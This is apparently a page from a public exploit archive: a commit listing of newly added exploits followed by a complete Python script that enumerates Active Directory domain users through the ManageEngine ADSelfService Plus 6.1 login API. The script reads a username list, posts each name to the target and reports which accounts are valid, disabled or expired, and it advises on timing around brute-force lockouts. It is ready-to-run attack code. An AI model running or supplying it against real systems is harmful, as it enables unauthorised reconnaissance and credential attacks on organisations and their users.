093714dc70
21 changes to exploits/shellcodes Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path 7-zip - Code Execution / Local Privilege Escalation PTPublisher v2.3.4 - Unquoted Service Path EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path Zyxel NWA-1100-NH - Command Injection ManageEngine ADSelfService Plus 6.1 - User Enumeration Verizon 4G LTE Network Extender - Weak Credentials Algorithm Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Scriptcase 9.7 - Remote Code Execution (RCE) WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection Easy Appointments 1.4.2 - Information Disclosure WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS) WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated) REDCap 11.3.9 - Stored Cross Site Scripting PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
63 lines
No EOL
2.4 KiB
Python
Executable file
63 lines
No EOL
2.4 KiB
Python
Executable file
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
|
|
# Exploit Author: Metin Yunus Kandemir
|
|
# Vendor Homepage: https://www.manageengine.com/
|
|
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
|
|
# Version: ADSelfService 6.1 Build 6121
|
|
# Tested Against: Build 6118 - 6121
|
|
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
|
|
|
|
# !/usr/bin/python3
|
|
import requests
|
|
import sys
|
|
import time
|
|
import urllib3
|
|
from urllib3.exceptions import InsecureRequestWarning
|
|
|
|
"""
|
|
The domain users can be enumerated like userenum module of the kerbrute tool using this exploit.
|
|
If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive.
|
|
"""
|
|
|
|
def request(target, user):
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
url = target + 'ServletAPI/accounts/login'
|
|
data = {"loginName": user}
|
|
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
|
|
req = requests.post(url, data=data, headers=headers, verify=False)
|
|
|
|
# For debugging
|
|
# print("[*] Response for " + user + ": " + req.text.strip())
|
|
if 'PASSWORD' in req.text:
|
|
print("[+] " + user + " is VALID!")
|
|
elif 'Your account has been disabled' in req.text:
|
|
print("[+] " + user + " account has been DISABLED.")
|
|
elif 'Your account has expired' in req.text:
|
|
print("[+] " + user + " account has EXPIRED.")
|
|
elif 'Enter the text as shown in the image.' in req.text:
|
|
print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
|
|
elif 'Permission Denied.' in req.text:
|
|
print("[-] " + user + " is not found.")
|
|
|
|
|
|
def get_users(target, file):
|
|
try:
|
|
file = open(file, "r")
|
|
for line in file:
|
|
line = line.strip()
|
|
time.sleep(0.5)
|
|
request(target, user=line)
|
|
except FileNotFoundError:
|
|
print("[-] File not found!")
|
|
sys.exit(1)
|
|
|
|
|
|
def main(args):
|
|
if len(args) != 3:
|
|
print("[*] Usage: %s url usernames_file" % (args[0]))
|
|
print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0]))
|
|
sys.exit(1)
|
|
get_users(target=args[1], file=args[2])
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main(args=sys.argv) |